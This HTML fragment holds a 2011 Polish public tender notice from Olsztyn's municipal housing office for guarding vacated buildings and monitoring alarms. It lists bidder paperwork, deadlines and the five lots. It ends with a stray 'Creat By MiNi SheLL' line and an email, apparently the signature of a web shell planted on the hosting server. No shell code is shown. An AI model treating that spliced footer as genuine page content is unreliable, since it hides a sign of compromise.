<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie wykonawcy potwierdzające spełnienie warunków ustawowych określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych  (załącznik nr 2 do SIWZ )</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. Zamawiający działając w oparciu o art. 144 ust 1 Ustawy określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
- zmiana osób odpowiedzialnych za kontakty i nadzór nad realizacją przedmiotu umowy;
- wystąpienie oczywistych omyłek pisarskich i rachunkowych w treści umowy,
- zmiany stawki należnego podatku VAT na inną niż obowiązująca w dniu składania ofert. Wprowadzenie powyższej zmiany nastąpi z dniem obowiązywania zmiany w/w stawki na inną, w wyniku zmiany powszechnie obowiązujących przepisów prawa  i zgodnie z tymi przepisami,
- zmiana załącznika nr 7 do SIWZ, będącego jednocześnie załącznikiem nr 1 do umowy. Aktualizacja danych uwzględnionych w w/w załączniku odbywać się będzie w dniu dokonania zmiany, w formie pisemnej. Zmiany w/w załącznika obowiązują od dnia ich wprowadzenia bez konieczności wypowiadania i zmiany umowy. Obowiązującym jest pisemne zawiadomienie Wykonawcy
- zmiana okresu obowiązywania umowy w przypadkach określonych w Rozdziale IV niniejszej SIWZ,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlibk.olsztyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Lokali i Budynków Komunalnych w Olsztynie ul. Cicha 5, 10-313 Olsztyn pokój 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.12.2011 godzina 09:00, miejsce: Zakład Lokali i Budynków Komunalnych w Olsztynie ul. Cicha 5, 10-313 Olsztyn - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> całodobowy dozór i ochrona fizyczna nieruchomości gruntowej, zabudowanej 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowego dozoru   i ochrony fizycznej , polegających na: 
ZADANIE I
- całodobowym dozorze i ochronie fizycznej nieruchomości gruntowej, zabudowanej 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49
WARUNKI REALIZACJI:
1) Ochrona mienia realizowana będzie na terenie nieruchomości gruntowej zabudowanej, 1 budynkiem opróżnionym i wykwaterowanym, położonej w Olsztynie przy ul. Knosały 7c oznaczonej w ewidencji gruntów i budynków obrębu nr 65 m. Olsztyn, działka nr 49 
2) Zakres ochrony obejmuje zabezpieczenie chronionego terenu i opróżnionego budynku                 w celu zapobieżenia kradzieżom, dewastacji mienia, wtargnięcia osób niepowołanych, pożarom i awariom instalacji wywołanych przez osoby trzecie, niedopuszczeniem do wstępu osób nieupoważnionych na teren chroniony.
3) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta).
4) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje.
5) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb.
6) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny.
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
2) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
4) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
5) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,                            a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
6) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 1, 2, 3 i 4 niniejszego punktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> całodobowy dozór i ochrona fizyczna budynku przy ul. Kołobrzeskiej 32B w Olsztynie obejmująca lokale wykwaterowane oraz części wspólne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowego dozoru i ochrony fizycznej , polegających na: całodobowym dozorze i ochronie fizycznej budynku przy ul. Kołobrzeskiej 32B w Olsztynie obejmującej lokale wykwaterowane oraz części wspólne.
WARUNKI REALIZACJI: 
1) Ochrona mienia realizowana będzie w budynku przy ul. Kołobrzeskiej 32B w Olsztynie w zakresie obejmującym części wspólne i lokale wykwaterowane, zgodnie z załącznikiem nr 1 do niniejszej umowy.
2) Aktualizacja danych uwzględnionych w załączniku nr 7 do SIWZ, będącym jednocześnie załącznikiem nr 1 do umowy odbywać się będzie w dniu dokonania zmiany, w formie pisemnej. Zmiany w/w obowiązują od dnia ich wprowadzenia bez konieczności wypowiadania i zmiany umowy. Obowiązującym jest pisemne zawiadomienie Wykonawcy.
3) Zakres ochrony obejmuje zabezpieczenie opróżnionych i wykwaterowanych lokali i części wspólnych w celu zapobieżenia kradzieżom, dewastacji mienia, wtargnięcia osób niepowołanych, pożarom i awariom instalacji wywołanych przez osoby trzecie, niedopuszczeniem do wstępu osób nieupoważnionych na teren chroniony.
4) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta)
5) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje.
6) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb.
7) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny. 
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) Pracownik ochrony fizycznej jest zobowiązany do zamykania w godzinach 22:00 - 06:00 wyjścia awaryjnego znajdującego się w ścianie szczytowej przedmiotowego budynku                   od  strony ul. Kołobrzeskiej oraz zobowiązany jest do zamieszczenia w przedmiotowym budynku informacji o umiejscowieniu klucza do w/w wyjścia awaryjnego.
2) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
3) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
4) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
5) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
6) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,                            a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
7) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 2, 3, 4 5 niniejszego punktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> całodobowy dozór i ochrona fizyczna 3 pawilonów kontenerowych ( działka Nr 27/1 obręb 84 ) przy ul. Towarowej 18 M, N, L w Olsztynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowego dozoru  i ochrony fizycznej , polegających na: całodobowym dozorze i ochronie fizycznej 3 pawilonów kontenerowych ( działka Nr 27/1 obręb 84 ) przy ul. Towarowej 18 M, N, L w Olsztynie
WARUNKI REALIZACJI: 
1) Ochrona mienia realizowana będzie na terenie nieruchomości położonej w Olsztynie przy ul. Towarowej 18 M, N, L oznaczonej w ewidencji gruntów i budynków obrębu 84 m. Olsztyna, działka nr 27/1.
2) Zakres ochrony obejmuje zabezpieczenie nowowybudowanych, częściowo zasiedlonych 3 pawilonów kontenerowych w celu zapobieżenia dewastacji mienia, wtargnięcia osób niepowołanych, zapobieżenia pożarom i awariom instalacji, a także niedopuszczenia do wstępu osób nieupoważnionych na teren chroniony.
3) Ochrona fizyczna wykonywana będzie poprzez stały dozór fizyczny całodobowo przez 7 dni w tygodniu w dni robocze (w tym soboty) oraz w dni wolne od pracy (niedziele, święta)
4) Ochrona fizyczna realizowana będzie przez co najmniej jednego pracownika posiadającego odpowiednie kwalifikacje
5) W razie zagrożenia chronionego mienia Wykonawca zobowiązany jest podjąć czynności zmierzające do zapobieżenia wystąpieniu szkody, a  w razie jej zaistnienia do ograniczenia jej rozmiarów i natychmiastowego powiadomienia Zamawiającego, Policji, Straży Pożarnej i innych właściwych służb
6) Wykonawca dołoży wszelkich starań, aby realizować usługę ochrony mienia 
z należytą starannością wymaganą dla usług tego rodzaju, czyli w sposób profesjonalny  i  kompetentny.
ZAKRES ZADAŃ I OBOWIĄZKÓW PRACOWNIKÓW WYKONAWCY
1) osoby wykonujące usługę ochrony mienia muszą posiadać odpowiednie kwalifikacje i uprawnienia oraz muszą być sprawdzone pod względem niekaralności i odpowiednio przeszkolone. 
2) Pracownicy ochrony fizycznej muszą nosić ubiór umożliwiający ich identyfikację oraz identyfikację podmiotu zatrudniającego.
3) Identyfikatory i odznaki pracowników ochrony fizycznej zatrudnionych przez Wykonawcę muszą w sposób widoczny różnić się od identyfikatorów i odznak funkcjonariuszy  i pracowników służb publicznych.
4) Pracownicy ochrony fizycznej muszą być wyposażeni przez Wykonawcę w odpowiednie środki łączności i komunikacji.
5) Zamawiający ma prawo domagać się zmiany pracowników ochrony fizycznej,                            a Wykonawca jest zobowiązany do dokonania takiej zmiany w ciągu 3 dni od pisemnego powiadomienia przez Zamawiającego.
6) O każdej zmianie w składzie pracowników ochrony Wykonawca będzie zawiadamiać Zamawiającego niezwłocznie na piśmie. Wykonawca ma prawo do zmiany pracowników ochrony prowadzących działania prewencyjne mając na uwadze podniesienie bezpieczeństwa chronionego obiektu Zamawiającego. W razie zmiany składu personalnego pracowników ochrony, nowo wprowadzone osoby będą spełniały wymogi określone w pkt 1, 2, 3 i 4 niniejszego punktu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> całodobowy dozór i ochrona fizyczna lokalu nr 6 w budynku przy ul. Nowowiejskiego 7 w Olsztynie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie całodobowego dozoru  i ochrony fizycznej , polegających na: całodobowym dozorze i ochronie fizycznej lokalu nr 6 w budynku przy ul. Nowowiejskiego 7 w Olsztynie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 98.34.11.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Cichej 5 w Olsztynie oraz stały nadzór systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Kopernika 45 w Olsztynie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług w zakresie  nadzoru systemu alarmowego zainstalowanego w pomieszczeniach w budynkach administrowanych przez Zakład Lokali i Budynków Komunalnych w Olsztynie, polegających na: 1) stałym nadzorze systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Cichej 5 w Olsztynie.
2) stałym nadzorze systemu alarmowego zainstalowanego w pomieszczeniach w budynku przy ul. Kopernika 45 w Olsztynie.

WARUNKI REALIZACJI: 
1) Usługa wykonywana będzie poprzez stały monitoring i w systemie ostrzegania całodobowo przez 7 dni w tygodniu.
2) Prowadzenie stałego nadzoru systemu alarmowego Wykonawcy będzie polegało na: 
a) całodobowym monitorowaniu sygnałów z systemu alarmowego Zamawiającego.
b) kontroli załączeń alarmowych w czasie, gdy:
- w budynku przy ul. Cichej nie przebywają pracownicy ZLiBK lub pracownicy firmy sprzątającej oraz w trakcie otwierania lub zamykania w/w budynku. 
- w budynku przy ul. Kopernika 45 w Olsztynie nie przebywają najemcy lokali użytkowych oraz w trakcie otwierania lub zamykania w/w budynku. 
c) całodobowej gotowości załóg interwencyjnych do podjęcia interwencji w ciągu 5 minut na sygnały wskazujące na dokonanie włamania lub napadu,
d) stałej kontroli poprawności łączy monitoringowych,
e) interwencjach na wezwanie w sytuacjach konfliktowych zaistniałych w obiekcie Zamawiającego,
f) Wykonawca zobowiązuje się do  4-krotnej nieodpłatnej zmiany kodu dostępu do budynku przy ul. Cichej 5 w Olsztynie wraz z przeszkoleniem nowego użytkownika. 
3) W przypadku odebrania sygnału o naruszeniu obszaru chronionego, operator zobowiązany jest do:
a) skierowania do chronionego obiektu zmotoryzowanego patrolu agentów ochrony w czasie najkrótszym od otrzymania sygnału alarmowego,
b) w przypadkach koniecznych powiadomienia Policji oraz Zamawiającego,
c) odnotowania otrzymania informacji i podjętych decyzji w książce dyżurów,
d) powiadomienia osoby upoważnionej przez Zamawiającego,
e) zabezpieczenia miejsca do czasu przybycia Policji i przedstawiciela Zamawiającego, za pierwszą godzinę w ramach umowy, a za każdą następną rozpoczętą  godzinę Zamawiający zapłaci Wykonawcy dodatkowo 15,00 zł plus podatek VAT.
f) w przypadku stwierdzenia wadliwości działania urządzeń alarmowych lub uszkodzeń systemu powstałych w wyniku działania osób trzecich albo w wyniku działania zdarzeń losowych niezwłocznie powiadomić Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.71.10.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com